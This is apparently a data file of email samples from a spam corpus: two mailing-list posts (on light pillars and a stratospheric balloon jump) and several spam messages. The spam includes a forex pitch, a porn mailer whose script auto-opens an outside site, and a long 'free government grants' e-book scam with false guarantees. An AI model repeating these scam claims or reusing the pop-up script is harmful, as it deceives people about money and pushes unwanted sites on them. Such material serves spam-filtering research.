 I know I've read about pillars under the Sun and Moon elsewhere, but I can't
 recall if they were reportedly dark or bright. I do know these sorts of
 things are supposed to be quirks of optics not of the visual system. I'm
 sorry I haven't got any answers, but a search through some books on
 atmospheric optics ought to turn a few hints up.
 Bill
 William Jacobs
 Freelance Unemployed Person
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free moneyZDVIJO
</t>
  </si>
  <si>
    <t xml:space="preserve">On January 1st 2002, the European countries began
 using the new Euro.  Never before have so
 many countries with such powerful economies united
 to use a single currency.  Get your piece of history
 now!  We would like to send you a FREE Euro
 and a FREE report on world currency.  Just visit
 our site to request your Euro and Euro report:
 http://www.endlessopportunitieshotline.com/EuroExchange/
 In addition to our currency report, you can receive
 our FREE INVESTMENT PACKAGE:
 *  Learn how $10,000 in options will leverage $1,000,000 in
 Euro Currency. This means even a small movement in the market
 has huge profit potential.
 If you are over age 18 and have some risk capital, it's
 important that you find out how the Euro will
 change the economic world and how you can profit!
 CLICK NOW! http://www.endlessopportunitieshotline.com/EuroExchange/
 $10,000 minimum investment
 Investing in Forex Currency options is speculative and includes a 
 high degree of risk. Investors can and do lose money.
 http://www.endlessopportunitieshotline.com/takemeoff/ To OptOut.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: The Big Jump
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Why so fast?  Normal terminal velocity is much slower.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; bitbitch@magnesium.net
 &gt; Sent: Sunday, September 08, 2002 8:36 AM
 &gt; To: (Robert Harley)
 &gt; Cc: fork@example.com
 &gt; Subject: Re: The Big Jump
 &gt; 
 &gt; 
 &gt; 
 &gt; So uh, would this qualify for the Darwin awards if he doesn't make it?
 &gt; 
 &gt; Freaking french people...
 &gt;    :-)
 &gt; -BB
 &gt; RH&gt; Today a French officer called Michel Fournier is supposed to get
 in a
 &gt; RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
 km
 &gt; RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
 reach
 &gt; RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
 the
 &gt; RH&gt; end, although with an automatic backup if he is 7 seconds from the
 &gt; RH&gt; ground and still hasn't opened it.
 &gt; 
 &gt; RH&gt; R
 &gt; 
 &gt; RH&gt; ObQuote:
 &gt; RH&gt;   "Veder, si aver si grossi li coglioni, come ha il re di
 Franza."
 &gt; RH&gt;   ("Let's see if I've got as much balls as the King of France!")
 &gt; RH&gt;   - Pope Julius II, 2 January 1511
 &gt; 
 &gt; 
 &gt; 
 &gt; --
 &gt; Best regards,
 &gt;  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Collect Your Money! Time:12:13:18 AM
</t>
  </si>
  <si>
    <t xml:space="preserve">PROFESSIONAL, EFFECTIVE DEBT COLLECTION SERVICES AVAILABLE
 For the last seventeen years, National Credit Systems, Inc. has been providing
 top flight debt collection services to over 15,000 businesses, institutions, and 
 healthcare providers.
 We charge only a low-flat fee (less than $20) per account, and all proceeds are 
 forwarded to you directly -- not to your collections agency.
 If you wish, we will report unpaid accounts to Experian (formerly TRW), 
 TRANSUNION, and Equifax. There is no charge for this important service.
 PLEASE LET US KNOW IF WE CAN BE OF SERVICE TO YOU.
 Simply reply to debt_collectors@btamail.net.cn with the following instructions 
 in the Subject field - 
 REMOVE  --  Please remove me from your mailing list.
 EMAIL   --  Please email more information.
 FAX     --  Please fax more information.
 MAIL    --  Please snailmail more information.
 CALL    --  Please have a representative call.
 Indicate the best time to telephone and any necessary addresses and 
 telephone/fax numbers in the text of your reply.
 If you prefer you can always telephone us during normal business hours 
 at (212) 213-3000 Ext 1425.
 Thank you.
 P.S. -- If you are not in need of our services at this time, please retain this 
 message for future use or past it on to a friend. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: make love tonight =?GB2312?B?w8DFrs28xqw=?=
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;script&gt;open("http://www.cn1688.net/girls/")&lt;/script&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;div align="center"&gt;
   &lt;p&gt;&lt;a href="http://www.cn1688.net/girls/"&gt;&lt;img src="http://www.virtuagirl.com/data/tour/postcard/postcard_07.gif" border="0"&gt;&lt;/a&gt; 
   &lt;/p&gt;
   &lt;p&gt;&lt;a href="http://www.cn1688.net/girls/"&gt;click here to see more&lt;/a&gt;&lt;/p&gt;
   &lt;p&gt;&lt;a href="http://www.cn1688.net/girls/"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: What a night!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
